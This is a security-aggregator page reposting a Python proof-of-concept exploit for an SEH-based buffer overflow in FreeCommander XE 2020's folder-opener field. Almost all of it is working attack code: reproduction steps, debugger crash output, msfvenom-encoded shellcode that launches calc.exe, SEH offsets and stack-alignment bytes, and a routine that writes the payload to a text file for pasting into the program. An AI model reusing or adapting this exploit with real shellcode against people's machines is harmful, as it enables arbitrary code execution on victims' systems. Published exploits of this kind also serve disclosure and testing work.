HackDig : Dig high-quality web security articles for hackers

«No Previous
No Next

FreeCommander XE 2020 Pathname Buffer Overflow

2020-03-29 09:05
#!/usr/bin/python# Exploit Title:    FreeCommander XE 2020 - Pathname Buffer Overflow (SEH)# Version:          Build 810a 32-bit# Software Link:    https://freecommander.com/downloads/FreeCommanderXE-32-public_setup.zip# Date:             2020-03-28# Exploit Author:   Hodorsec (hodor@hodorsec.com / hodorsec@protonmail.com)# Vendor Homepage:  https://www.freecommander.com# Tested on:        Win8.1 x64 - Build 9600# Description:      # - Exploits the command / folder opener in the main window by entering an overly string and pressing enter: a crash will occur and the Structured Exception Handler kicks in (SEH overflown).# - Some stack alignment was required, which eventually led to the ability of running shellcode.# Reproduction:# - Use indicated OS or manipulate settings for stack alignment: your mileage may vary due to different offsets on other Windows versions / SP's.# - Run the script, a TXT file will be generated# - On the Windows machine, open the TXT file in Wordpad. Copy and paste the output in the command / folder opener of FreeCommander# - Check results# WinDBG initial crash output:# (db4.648): Access violation - code c0000005 (!!! second chance !!!)# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:WindowsSYSTEM32ntdll.dll - # *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:Program Files (x86)FreeCommander XEFreeCommander.exe - # eax=00000000 ebx=00000000 ecx=00410041 edx=77e8ffaf esi=00000000 edi=00000000# eip=00410041 esp=00091620 ebp=00091640 iopl=0         nv up ei pl zr na pe nc# cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246# FreeCommander+0x10041:# 00410041 0064005c        add     byte ptr [eax+eax+5Ch],ah  ds:002b:0000005c=??import sys, struct# Filenamefilename = "win8_freecommander_poc.txt"# Maximum lengthmaxlen = 2000# Shellcode# msfvenom -p windows/exec cmd=calc.exe -e x86/unicode_mixed -b "x00x0ax0d" bufferregister=eax# Payload size: 512 bytesshellcode = ("PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlzHTBypkPm0aP2ixep190bDTKnpP0bk0RJl4Kobn44KbRKxjoFW0Jo6p1KODlml1Q3LlBNLKpy1XOLMm1UwgrzR1Br7tKobzp2k0JmlDKNlJq2XySPHzaHQR1bkaImPIqWc2k0In8jCmjMyRknT2kzaZ6maIo4leq6ozmm1i7NX7pPul6JccMzXmk3MKtSEhdnxTKb8ldza6srFBklLPKbkqHMLKQhSbkM4dKIqVp1ymtmTldokokQQaIoj21yoK01OOoPZDKzrxkDM1MaZZa4M55UbM0ipkPr0S8nQRkROu7KOWeukHpTuFB1F2HvFBuWMuMio6umlM6CLZjQpIk7pRUlEWKa7mCsBrO1ZypR3ioxU0cS12LosnNpet80eM0AA")# Offsetsseh = 522nseh = seh - 2# Venetian NOPnop = "x45"# Aligning EBP with buffer# ESP being closest to buffer# ESP = 0018ecc4, Buffer = 0018fb5f: Buffer - ESP = 0x0e9balign_esp = (   "x54"              # PUSH ESP                + nop +             # Padding                "x58"              # POP EAX                + nop +             # Padding                "x05x11x11"      # "x05x00x10x00x11" # 0500100011 add eax,0x11001000 --                + nop +             # Padding                                                   |--> Adds 0x0f00 bytes                "x2dx02x11"      # "x2dx00x01x00x11" # 2d00010011 sub eax,0x11000100 --/                + nop +             # Padding                "x40"              # INC EAX # Added due to one-off unicode byte                + nop +             # Padding                "x50"              # PUSH EAX                + nop +             # Padding                "xc3"              # RET)# Prefixprefix = "A" * seh                                              # Fill junk# NSEH/SEHnseh = "x41x45"                                               # NOP --> INC ECX # ADD [EBP], ALseh = "x71x4c"                                                # POP POP RET# Suffixsuffix = nop * 3                                                # Alignsuffix += align_esp                                             # Align registers; EAX for executing shellcodesuffix += nop * 48                                              # Nopping until buffersuffix += shellcode                                             # Do some magicsuffix += "D" * (maxlen - len(prefix + nseh + seh + suffix))    # Fill junk# Concatenate string for payloadpayload = prefix + nseh + seh + suffix                          # Put it all togethertry:    file = open(filename,"wb")    file.write(payload)    file.close()    print "[+] File " + filename + " with size of " + str(len(payload)) + " created successfully"except:    print "[!] Error creating file!"    sys.exit(0)


Source: 1610300202-BLW/eussi/moc.ytirucesxc

Read:990 | Comments:0 | Tags:No Tag

“FreeCommander XE 2020 Pathname Buffer Overflow”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Tools